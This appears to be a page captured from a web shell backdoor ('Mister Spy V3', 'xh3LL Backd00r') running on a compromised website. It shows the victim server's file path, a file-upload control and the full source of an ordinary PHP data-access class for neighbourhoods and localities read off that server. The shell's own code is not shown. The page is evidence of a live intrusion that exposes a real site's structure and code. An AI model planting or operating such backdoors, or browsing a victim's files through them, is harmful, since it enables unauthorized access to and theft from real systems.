Mister Spy Say ="Hello Kids ... :D" ___ ____ _ _____ | \/ (_) | | / ___| | . . |_ ___| |_ ___ _ __ \ `--. _ __ _ _ | |\/| | / __| __/ _ \ '__| `--. \ '_ \| | | | | | | | \__ \ || __/ | /\__/ / |_) | |_| | \_| |_/_|___/\__\___|_| \____/| .__/ \__, | | | __/ | |_| |___/ Bot Mister Spy V3
Mister Spy

Mister Spy

Current Path : /home/caballoscriollos/www/web/library/
Upload File :
Current File : /home/caballoscriollos/www/web/library/class.barrios.php

<?php 

require_once('class.dbaccess.php');
require_once('class.barrio.php');
require_once('class.localidad.php');
require_once('class.filter.php');
require_once('class.page.php');

class Barrios extends DBAccess implements IFilterable
{
	public function ParseFilter(array $filter)
	{
		$sql = '';
		
		if (isset($filter['Nombre']))
			$sql.= " AND b.Nombre LIKE '%" . DB::StringUnquoted($filter['Nombre']) . "%'";
		
		if ((isset($filter['IdLocalidad'])) && ($filter['IdLocalidad'] != ""))
			$sql.= " AND b.IdLocalidad = " . DB::Number($filter['IdLocalidad']);

		return $sql;
	}


	public function GetAll(array $filter = NULL, Page $oPage = NULL)
	{
		$sql = "SELECT b.*";
		$sql.= " FROM tblBarrios b";
		$sql.= " INNER JOIN tblLocalidades l ON b.IdLocalidad = l.IdLocalidad";
		$sql.= " INNER JOIN tblProvincias pr ON l.IdProvincia = pr.IdProvincia";
		$sql.= " INNER JOIN tblPaises pa ON pa.IdPais = pr.IdPais";
		$sql.= " WHERE 1";
		$sql.= ($filter) ? $this->ParseFilter($filter) : "";
		$sql.= " ORDER BY pa.Nombre, pr.Nombre, l.Nombre, b.Nombre ASC";
		$sql.= ($oPage) ? Pageable::ParsePage($oPage) : "";

		if (!($oRes = $this->GetQuery($sql)))
			return false;
			
		$arr = array();
		
		while ($oRow = $oRes->GetRow())	
		{	
			$oBarrio = new Barrio();
			$oBarrio->ParseFromArray($oRow);
			
			array_push($arr, $oBarrio);
			
			$oRes->MoveNext();
		}
		
		return $arr;
	}


	public function GetById($IdBarrio)
	{
		$sql = "SELECT b.*";
		$sql.= " FROM tblBarrios b";
		$sql.= " WHERE IdBarrio = " . DB::Number($IdBarrio);	
			
		if (!($oRes = $this->GetQuery($sql)))
			return false;
			
		if (!($oRow = $oRes->GetRow()))
			return false;
		
		$oBarrio = new Barrio();
		$oBarrio->ParseFromArray($oRow);
		
		return $oBarrio;
	}
	
	
	public function GetByNombre($Nombre)
	{
		$sql = "SELECT b.*";
		$sql.= " FROM tblBarrios b";
		$sql.= " WHERE b.Nombre = " . DB::String($Nombre);	

		if (!($oRes = $this->GetQuery($sql)))
			return false;
			
		if (!($oRow = $oRes->GetRow()))
			return false;
		
		$arr = array();
		
		while ($oRow = $oRes->GetRow())
		{	
			$oBarrio = new Barrio();
			$oBarrio->ParseFromArray($oRow);
			
			array_push($arr, $oBarrio);
			
			$oRes->MoveNext();
		}	
		
		return $arr;
	}
	
	
	public function GetAllByLocalidad(Localidad $oLocalidad)
	{
		$sql = "SELECT b.*";
		$sql.= " FROM tblBarrios b";
		$sql.= " WHERE b.IdLocalidad = " . DB::Number($oLocalidad->IdLocalidad);	

		if (!($oRes = $this->GetQuery($sql)))
			return false;
			
		if (!($oRow = $oRes->GetRow()))
			return false;
		
		$arr = array();
		
		while ($oRow = $oRes->GetRow())
		{	
			$oBarrio = new Barrio();
			$oBarrio->ParseFromArray($oRow);
			
			array_push($arr, $oBarrio);
			
			$oRes->MoveNext();
		}	
		
		return $arr;
	}
	
	
	public function GetCountRows(array $filter = NULL)
	{
		$sql = "SELECT b.*";
		$sql.= " FROM tblBarrios b";
		$sql.= " WHERE 1";
		$sql.= ($filter) ? $this->ParseFilter($filter) : "";

		if (!($oRes = $this->GetQuery($sql)))
			return false;
		
		$CountRows = $oRes->NumRows();
		
		return $CountRows;
	}
	
	
	public function Create(Barrio $oBarrio)
	{
		$arr = array
		(
			'IdLocalidad' 	=> DB::Number($oBarrio->IdLocalidad),
			'Nombre' 		=> DB::String($oBarrio->Nombre)
		);
		
		if (!$this->Insert('tblBarrios', $arr))
			return false;
			
		$oBarrio->IdBarrio = DBAccess::GetLastInsertId();
			
		return $oBarrio;
	
	}
	
	
	public function Update(Barrio $oBarrio)
	{
		$where = " IdBarrio = " . DB::Number($oBarrio->IdBarrio);
		
		$arr = array
		(
			'IdLocalidad' 	=> DB::Number($oBarrio->IdLocalidad),
			'Nombre' 		=> DB::String($oBarrio->Nombre)
		);
		
		if (!DBAccess::UpdateEntidad('tblBarrios', $arr, $where))
			return false;
		
		return $oBarrio;
	}
	

	public function Delete($IdBarrio)
	{
		if (!DBAccess::$db->Begin())
			return false;
		
		$where = " IdBarrio = " . DB::Number($IdBarrio);
		if (!DBAccess::DeleteEntidad('tblBarrios', $where))
		{
			DBAccess::$db->Rollback();	
			return false;
		}

		DBAccess::$db->Commit();
		
		return true;
	}		
}

?>

Mr. DellatioNx196 GaLers xh3LL Backd00r 1.0, Coded By Mr. DellatioNx196 - Bogor BlackHat